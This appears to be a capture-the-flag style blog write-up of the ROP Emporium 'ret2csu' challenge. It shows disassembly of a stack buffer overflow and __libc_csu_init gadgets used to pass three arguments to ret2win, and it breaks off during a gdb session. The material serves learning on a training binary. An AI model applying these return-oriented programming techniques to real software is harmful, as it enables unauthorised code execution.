I"ÙÌ<p>We‚Äôre back in ret2win territory, but this time with no useful gadgets.How will we populate critical registers without them?
The goal of this level is understanding of universal rop techniques due to limited gadgets available in the binary as compared to the ret2win challenge. The binary can be downloaded from authors website <a href="https://ropemporium.com">Ropemporium</a></p>

<p>After downloading the binary, check enabled protections and mitigation‚Äôs. Only <strong>NX</strong> and Partial RELRO protections are turned on as shown below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="o">(</span>0x400000<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>First is finding the vulnerability in the binary that will enable us to subvert program execution control flow. From the disassembly of main function we are only calling <strong>pwnme</strong> function.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">main</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">main</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x0000000000400607</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x0000000000400608</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
   <span class="err">0</span><span class="nf">x000000000040060b</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400500</span> <span class="o">&lt;</span><span class="nv">pwnme@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400610</span> <span class="o">&lt;+</span><span class="mi">9</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x0000000000400615</span> <span class="o">&lt;+</span><span class="mi">14</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x0000000000400616</span> <span class="o">&lt;+</span><span class="mi">15</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The function reference the <code class="language-plaintext highlighter-rouge">got table</code> in order to load the actual address of <code class="language-plaintext highlighter-rouge">pwnme</code> function from <strong>libret2csu.so</strong> library after the first call.</p>

<h2 id="pwnme-function-disassembly">pwnme Function Disassembly</h2>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre></td> --><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">pwnme</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">pwnme</span><span class="p">:</span>
  <span class="err">0</span><span class="nf">x000000000000093a</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
  <span class="err">0</span><span class="nf">x000000000000093b</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
  <span class="err">0</span><span class="nf">x000000000000093e</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">sub</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x20</span>
  <span class="err">0</span><span class="nf">x0000000000000942</span> <span class="o">&lt;+</span><span class="mi">8</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rax</span><span class="p">,</span><span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x201697</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x201fe0</span>
  <span class="err">0</span><span class="nf">x0000000000000949</span> <span class="o">&lt;+</span><span class="mi">15</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rax</span><span class="p">,</span><span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span>
  <span class="err">0</span><span class="nf">x000000000000094c</span> <span class="o">&lt;+</span><span class="mi">18</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x0</span>
  <span class="err">0</span><span class="nf">x0000000000000951</span> <span class="o">&lt;+</span><span class="mi">23</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
  <span class="err">0</span><span class="nf">x0000000000000956</span> <span class="o">&lt;+</span><span class="mi">28</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
  <span class="err">0</span><span class="nf">x000000000000095b</span> <span class="o">&lt;+</span><span class="mi">33</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
  <span class="err">0</span><span class="nf">x000000000000095e</span> <span class="o">&lt;+</span><span class="mi">36</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x820</span> <span class="o">&lt;</span><span class="nv">setvbuf@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x0000000000000963</span> <span class="o">&lt;+</span><span class="mi">41</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x31e</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xc88</span>
  <span class="err">0</span><span class="nf">x000000000000096a</span> <span class="o">&lt;+</span><span class="mi">48</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7a0</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x000000000000096f</span> <span class="o">&lt;+</span><span class="mi">53</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x32a</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xca0</span>
  <span class="err">0</span><span class="nf">x0000000000000976</span> <span class="o">&lt;+</span><span class="mi">60</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7a0</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x000000000000097b</span> <span class="o">&lt;+</span><span class="mi">65</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
  <span class="err">0</span><span class="nf">x000000000000097f</span> <span class="o">&lt;+</span><span class="mi">69</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x20</span>
  <span class="err">0</span><span class="nf">x0000000000000984</span> <span class="o">&lt;+</span><span class="mi">74</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
  <span class="err">0</span><span class="nf">x0000000000000989</span> <span class="o">&lt;+</span><span class="mi">79</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
  <span class="err">0</span><span class="nf">x000000000000098c</span> <span class="o">&lt;+</span><span class="mi">82</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7d0</span> <span class="o">&lt;</span><span class="nv">memset@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x0000000000000991</span> <span class="o">&lt;+</span><span class="mi">87</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x310</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xca8</span>
  <span class="err">0</span><span class="nf">x0000000000000998</span> <span class="o">&lt;+</span><span class="mi">94</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7a0</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x000000000000099d</span> <span class="o">&lt;+</span><span class="mi">99</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x36e</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xd12</span>
  <span class="err">0</span><span class="nf">x00000000000009a4</span> <span class="o">&lt;+</span><span class="mi">106</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
  <span class="err">0</span><span class="nf">x00000000000009a9</span> <span class="o">&lt;+</span><span class="mi">111</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7c0</span> <span class="o">&lt;</span><span class="nv">printf@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x00000000000009ae</span> <span class="o">&lt;+</span><span class="mi">116</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
  <span class="err">0</span><span class="nf">x00000000000009b2</span> <span class="o">&lt;+</span><span class="mi">120</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x200</span>
  <span class="err">0</span><span class="nf">x00000000000009b7</span> <span class="o">&lt;+</span><span class="mi">125</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nb">rax</span>
  <span class="err">0</span><span class="nf">x00000000000009ba</span> <span class="o">&lt;+</span><span class="mi">128</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x0</span>
  <span class="err">0</span><span class="nf">x00000000000009bf</span> <span class="o">&lt;+</span><span class="mi">133</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7f0</span> <span class="o">&lt;</span><span class="nv">read@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x00000000000009c4</span> <span class="o">&lt;+</span><span class="mi">138</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x34a</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xd15</span>
  <span class="err">0</span><span class="nf">x00000000000009cb</span> <span class="o">&lt;+</span><span class="mi">145</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x7a0</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
  <span class="err">0</span><span class="nf">x00000000000009d0</span> <span class="o">&lt;+</span><span class="mi">150</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">nop</span>
  <span class="err">0</span><span class="nf">x00000000000009d1</span> <span class="o">&lt;+</span><span class="mi">151</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">leave</span>
  <span class="err">0</span><span class="nf">x00000000000009d2</span> <span class="o">&lt;+</span><span class="mi">152</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From the above disassembled code, we are reading more than the allocated buffer from the standard input, therefore leading to stack buffer overflow and corrupting the adjacent memory region. The program allocates a stack of fixed size <code class="language-plaintext highlighter-rouge">32bytes</code> and reading <strong>0x200</strong> from the standard input file descriptor, which is more than the buffer size.
The c equivalent of the above vulnerability is,</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">),</span> <span class="mh">0x200</span><span class="p">)</span> <span class="err">#</span><span class="n">reading</span> <span class="mh">0x200</span> <span class="n">from</span> <span class="n">the</span> <span class="n">stdin</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>For exploitation purpose, goal is to control the return address of <code class="language-plaintext highlighter-rouge">pwnme</code> function and redirect execution to our desired address. In order to control the return address we need to fill the buffer with enough data and overflow the saved base pointer.</p>

<p><img src="/assets/images/ropemporium/stack.png" alt="ret control" /></p>

<p>From the stack image layout above, we need 32 bytes to fill the buffer, 8 bytes to overwrite the saved base pointer and 8 bytes to control return address. Because the <strong>NX</strong> execution is enabled on the binary, we can`t use the shellcode techniques, therefore we use other methods such a ropping.</p>

<h2 id="libc_csu_init-disassembly"><strong>libc_csu_init</strong> Disassembly</h2>

<p>Below is the disassembled code for <strong>__libc_csu_init</strong> section for the ret2csu binary using objdump tool.objdump is a linux command line tool used for disassembling binaries.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
</pre></td> --><td class="rouge-code"><pre><span class="err">0000000000400640</span> <span class="err">&lt;</span><span class="nf">__libc_csu_init</span><span class="o">&gt;</span><span class="p">:</span>
  <span class="err">400640:</span>	<span class="err">41</span> <span class="err">57</span>                	<span class="nf">push</span>   <span class="nv">r15</span>
  <span class="err">400642:</span>	<span class="err">41</span> <span class="err">56</span>                	<span class="nf">push</span>   <span class="nv">r14</span>
  <span class="err">400644:</span>	<span class="err">49</span> <span class="err">89</span> <span class="nf">d7</span>             	<span class="nv">mov</span>    <span class="nv">r15</span><span class="p">,</span><span class="nb">rdx</span>
  <span class="err">400647:</span>	<span class="err">41</span> <span class="err">55</span>                	<span class="nf">push</span>   <span class="nv">r13</span>
  <span class="err">400649:</span>	<span class="err">41</span> <span class="err">54</span>                	<span class="nf">push</span>   <span class="nv">r12</span>
  <span class="err">40064</span><span class="nl">b:</span>	<span class="err">4</span><span class="nf">c</span> <span class="mi">8</span><span class="nv">d</span> <span class="mi">25</span> <span class="mi">9</span><span class="nv">e</span> <span class="mi">07</span> <span class="mi">20</span> <span class="mi">00</span> 	<span class="nv">lea</span>    <span class="nv">r12</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x20079e</span><span class="p">]</span>        <span class="err">#</span> <span class="mi">600</span><span class="nv">df0</span> <span class="o">&lt;</span><span class="nv">__frame_dummy_init_array_entry</span><span class="o">&gt;</span>
  <span class="err">400652:</span>	<span class="err">55</span>                   	<span class="nf">push</span>   <span class="nb">rbp</span>
  <span class="err">400653:</span>	<span class="err">48</span> <span class="err">8</span><span class="nf">d</span> <span class="mi">2</span><span class="nv">d</span> <span class="mi">9</span><span class="nv">e</span> <span class="mi">07</span> <span class="mi">20</span> <span class="mi">00</span> 	<span class="nv">lea</span>    <span class="nb">rbp</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x20079e</span><span class="p">]</span>        <span class="err">#</span> <span class="mi">600</span><span class="nv">df8</span> <span class="o">&lt;</span><span class="nv">__do_global_dtors_aux_fini_array_entry</span><span class="o">&gt;</span>
  <span class="err">40065</span><span class="nl">a:</span>	<span class="err">53</span>                   	<span class="nf">push</span>   <span class="nb">rbx</span>
  <span class="err">40065</span><span class="nl">b:</span>	<span class="err">41</span> <span class="err">89</span> <span class="nf">fd</span>             	<span class="nv">mov</span>    <span class="nb">r13d</span><span class="p">,</span><span class="nb">edi</span>
  <span class="err">40065</span><span class="nl">e:</span>	<span class="err">49</span> <span class="err">89</span> <span class="nf">f6</span>             	<span class="nv">mov</span>    <span class="nv">r14</span><span class="p">,</span><span class="nb">rsi</span>
  <span class="err">400661:</span>	<span class="err">4</span><span class="nf">c</span> <span class="mi">29</span> <span class="nv">e5</span>             	<span class="nv">sub</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nv">r12</span>
  <span class="err">400664:</span>	<span class="err">48</span> <span class="err">83</span> <span class="nf">ec</span> <span class="mi">08</span>          	<span class="nv">sub</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x8</span>
  <span class="err">400668:</span>	<span class="err">48</span> <span class="nf">c1</span> <span class="nv">fd</span> <span class="mi">03</span>          	<span class="nv">sar</span>    <span class="nb">rbp</span><span class="p">,</span><span class="mh">0x3</span>
  <span class="err">40066</span><span class="nl">c:</span>	<span class="nf">e8</span> <span class="mi">5</span><span class="nv">f</span> <span class="nv">fe</span> <span class="nv">ff</span> <span class="nv">ff</span>       	<span class="nv">call</span>   <span class="mi">4004</span><span class="nv">d0</span> <span class="o">&lt;</span><span class="nv">_init</span><span class="o">&gt;</span>
  <span class="err">400671:</span>	<span class="err">48</span> <span class="err">85</span> <span class="nf">ed</span>             	<span class="nv">test</span>   <span class="nb">rbp</span><span class="p">,</span><span class="nb">rbp</span>
  <span class="err">400674:</span>	<span class="err">74</span> <span class="err">20</span>                	<span class="nf">je</span>     <span class="mi">400696</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mh">0x56</span><span class="o">&gt;</span>
  <span class="err">400676:</span>	<span class="err">31</span> <span class="kd">db</span>                	<span class="nv">xor</span>    <span class="nb">ebx</span><span class="p">,</span><span class="nb">ebx</span>
  <span class="err">400678:</span>	<span class="err">0</span><span class="nf">f</span> <span class="mi">1</span><span class="nv">f</span> <span class="mi">84</span> <span class="mi">00</span> <span class="mi">00</span> <span class="mi">00</span> <span class="mi">00</span> 	<span class="nv">nop</span>    <span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">rax</span><span class="o">+</span><span class="nb">rax</span><span class="o">*</span><span class="mi">1</span><span class="o">+</span><span class="mh">0x0</span><span class="p">]</span>
  <span class="err">40067</span><span class="nl">f:</span>	<span class="err">00</span>
  <span class="err">400680:</span>	<span class="err">4</span><span class="nf">c</span> <span class="mi">89</span> <span class="nv">fa</span>             	<span class="nv">mov</span>    <span class="nb">rdx</span><span class="p">,</span><span class="nv">r15</span>
  <span class="err">400683:</span>	<span class="err">4</span><span class="nf">c</span> <span class="mi">89</span> <span class="nv">f6</span>             	<span class="nv">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nv">r14</span>
  <span class="err">400686:</span>	<span class="err">44</span> <span class="err">89</span> <span class="nf">ef</span>             	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="nb">r13d</span>
  <span class="err">400689:</span>	<span class="err">41</span> <span class="nf">ff</span> <span class="mi">14</span> <span class="nv">dc</span>          	<span class="nv">call</span>   <span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">r12</span><span class="o">+</span><span class="nb">rbx</span><span class="o">*</span><span class="mi">8</span><span class="p">]</span>
  <span class="err">40068</span><span class="nl">d:</span>	<span class="err">48</span> <span class="err">83</span> <span class="nf">c3</span> <span class="mi">01</span>          	<span class="nv">add</span>    <span class="nb">rbx</span><span class="p">,</span><span class="mh">0x1</span>
  <span class="err">400691:</span>	<span class="err">48</span> <span class="err">39</span> <span class="kd">dd</span>             	<span class="nv">cmp</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rbx</span>
  <span class="err">400694:</span>	<span class="err">75</span> <span class="nf">ea</span>                	<span class="nv">jne</span>    <span class="mi">400680</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mh">0x40</span><span class="o">&gt;</span>
  <span class="err">400696:</span>	<span class="err">48</span> <span class="err">83</span> <span class="nf">c4</span> <span class="mi">08</span>          	<span class="nv">add</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x8</span>
  <span class="err">40069</span><span class="nl">a:</span>	<span class="err">5</span><span class="nf">b</span>                   	<span class="nv">pop</span>    <span class="nb">rbx</span>
  <span class="err">40069</span><span class="nl">b:</span>	<span class="err">5</span><span class="nf">d</span>                   	<span class="nv">pop</span>    <span class="nb">rbp</span>
  <span class="err">40069</span><span class="nl">c:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">c</span>                	<span class="nv">pop</span>    <span class="nv">r12</span>
  <span class="err">40069</span><span class="nl">e:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">d</span>                	<span class="nv">pop</span>    <span class="nv">r13</span>
  <span class="err">4006</span><span class="nl">a0:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">e</span>                	<span class="nv">pop</span>    <span class="nv">r14</span>
  <span class="err">4006</span><span class="nl">a2:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">f</span>                	<span class="nv">pop</span>    <span class="nv">r15</span>
  <span class="err">4006</span><span class="nl">a4:</span>	<span class="nf">c3</span>                   	<span class="nv">ret</span>
  <span class="err">4006</span><span class="nl">a5:</span>	<span class="err">90</span>                   	<span class="nf">nop</span>
  <span class="err">4006</span><span class="nl">a6:</span>	<span class="err">66</span> <span class="err">2</span><span class="nf">e</span> <span class="mi">0</span><span class="nv">f</span> <span class="mi">1</span><span class="nv">f</span> <span class="mi">84</span> <span class="mi">00</span> <span class="mi">00</span> 	<span class="nb">cs</span> <span class="nv">nop</span> <span class="kt">WORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">rax</span><span class="o">+</span><span class="nb">rax</span><span class="o">*</span><span class="mi">1</span><span class="o">+</span><span class="mh">0x0</span><span class="p">]</span>
  <span class="err">4006</span><span class="nl">ad:</span>	<span class="err">00</span> <span class="err">00</span> <span class="err">00</span>

<span class="err">00000000004006</span><span class="nf">b0</span> <span class="o">&lt;</span><span class="nv">__libc_csu_fini</span><span class="o">&gt;</span><span class="p">:</span>
  <span class="err">4006</span><span class="nl">b0:</span>	<span class="nf">f3</span> <span class="nv">c3</span>                	<span class="nv">repz</span> <span class="nv">ret</span> <span class="nv">z</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The <strong>__libc_csu_init</strong> section contains a sequence of pop, ret instructions which makes it a good attack vector for our rop chain. The gadgets present in this section enables us to control <strong>RBX, RBP, R12, R13, R14, and R15</strong> registers. From the ret-to-csu referenced paper this makes it a perfect candidate for our first stage and second stage rop chain.</p>

<p>The first stage gadget is shown in disassembled code below. This enables us to control the registers with the values we want, which makes our second stage gadget more controllable.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>  <span class="err">40069</span><span class="nl">a:</span>	<span class="err">5</span><span class="nf">b</span>                   	<span class="nv">pop</span>    <span class="nb">rbx</span>
  <span class="err">40069</span><span class="nl">b:</span>	<span class="err">5</span><span class="nf">d</span>                   	<span class="nv">pop</span>    <span class="nb">rbp</span>
  <span class="err">40069</span><span class="nl">c:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">c</span>                	<span class="nv">pop</span>    <span class="nv">r12</span>
  <span class="err">40069</span><span class="nl">e:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">d</span>                	<span class="nv">pop</span>    <span class="nv">r13</span>
  <span class="err">4006</span><span class="nl">a0:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">e</span>                	<span class="nv">pop</span>    <span class="nv">r14</span>
  <span class="err">4006</span><span class="nl">a2:</span>	<span class="err">41</span> <span class="err">5</span><span class="nf">f</span>                	<span class="nv">pop</span>    <span class="nv">r15</span>
  <span class="err">4006</span><span class="nl">a4:</span>	<span class="nf">c3</span>                   	<span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>For the second stage, we need to look for the gadgets that will enable us to control the <strong>RDI, RSI and RDX</strong> registers in that order. This is because of x86_64 calling convention, the first three arguments to a function are passed in <strong>RDI, RSI and RDX</strong> registers respectively. From the disassembly of <strong>__libc_csu_init</strong> we can get our second gadget to build our rop chain.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="nf">mov</span>    <span class="nb">rdx</span><span class="p">,</span><span class="nv">r15</span>
<span class="nf">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nv">r14</span>
<span class="nf">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="nb">r13d</span>
<span class="nf">call</span>   <span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">r12</span><span class="o">+</span><span class="nb">rbx</span><span class="o">*</span><span class="mi">8</span><span class="p">]</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From the above code, we are now able to control the <strong>rdx, rsi and edi</strong> registers.The call in the second stage gadgets, calculates the destination address of our code.</p>

<p>Because we have all the gadgets we need to build our rop chain. From the authors website, the challenge is very similar to <strong>ret2win</strong> challenge.</p>

<blockquote>
  <p>This challenge is very similar to ‚Äúcallme‚Äù, with the exception of the useful gadgets. Simply call the ret2win() function in the accompanying library with same arguments that you used to beat the ‚Äúcallme‚Äù challenge (ret2win(0xdeadbeef, 0xcafebabe, 0xd00df00d) for the ARM &amp; MIPS binaries, ret2win(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d) for the x86_64 binary.</p>
</blockquote>

<p>From the description, we want to pass three arguments to ret2win function. The arguments will be passed to rdi, rsi and rdx respectively. Because we don`t control the these registers directly, we need to set these arguments in the first rop chain that will enable us to control the rdi, rsi and rdx in the second gadget.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nf">rdi</span> <span class="o">&lt;--</span> <span class="nv">r13</span> <span class="o">&lt;--</span>  <span class="err">#</span><span class="nv">first</span> <span class="nv">args</span>   <span class="mh">0xdeadbeefdeadbeef</span>
<span class="nf">rsi</span> <span class="o">&lt;--</span> <span class="nv">r14</span> <span class="o">&lt;--</span>  <span class="err">#</span><span class="nv">second</span> <span class="nv">args</span>  <span class="mh">0xcafebabecafebabe</span>
<span class="nf">rdx</span> <span class="o">&lt;--</span> <span class="nv">r15</span> <span class="o">&lt;--</span>  <span class="err">#</span><span class="nv">third</span> <span class="nv">args</span>   <span class="mh">0xd00df00dd00df00d</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From code snip above, we can control the registers values as shown in the code above. For debugging our exploit we will use python3 and gdb to ensure that there is no unexpected behavior which may cause crashes.</p>

<p>Set a breakpoint in our first address of the ropchain gadget, and run binary with the generated payload.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">break</span> <span class="o">*</span><span class="mh">0x000000000040069a</span>
<span class="nf">Breakpoint</span> <span class="mi">1</span> <span class="nv">at</span> <span class="mh">0x40069a</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">r</span> <span class="o">&lt;/</span><span class="nv">tmp</span><span class="o">/</span><span class="nv">payload</span>
